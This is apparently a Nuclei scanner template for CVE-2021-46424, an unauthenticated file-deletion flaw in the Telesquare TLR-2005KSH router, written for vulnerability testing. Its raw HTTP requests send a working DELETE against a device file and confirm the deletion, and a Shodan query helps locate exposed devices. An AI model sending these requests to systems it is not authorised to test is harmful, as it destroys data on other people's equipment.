47 lines
1.4 KiB
YAML
47 lines
1.4 KiB
YAML
id: CVE-2021-46424
|
|
|
|
info:
|
|
name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete
|
|
author: gy741
|
|
severity: critical
|
|
description: Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.
|
|
reference:
|
|
- https://dl.packetstormsecurity.net/2205-exploits/tlr2005ksh-filedelete.txt
|
|
- https://drive.google.com/drive/folders/1_e3eJ8fzhCWnCkoRpbLoyQecuKkPR4OD?usp=sharing
|
|
- http://packetstormsecurity.com/files/167127/TLR-2005KSH-Arbitrary-File-Delete.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-46424
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
|
|
cvss-score: 9.1
|
|
cve-id: CVE-2021-46424
|
|
cwe-id: CWE-306
|
|
epss-score: 0.01117
|
|
metadata:
|
|
max-request: 3
|
|
shodan-query: http.html:"TLR-2005KSH"
|
|
verified: "true"
|
|
tags: cve,cve2021,telesquare,intrusive,packetstorm
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /images/icons_title.gif HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
DELETE /images/icons_title.gif HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
GET /images/icons_title.gif HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"
|
|
|
|
# Enhanced by mp on 2022/05/18
|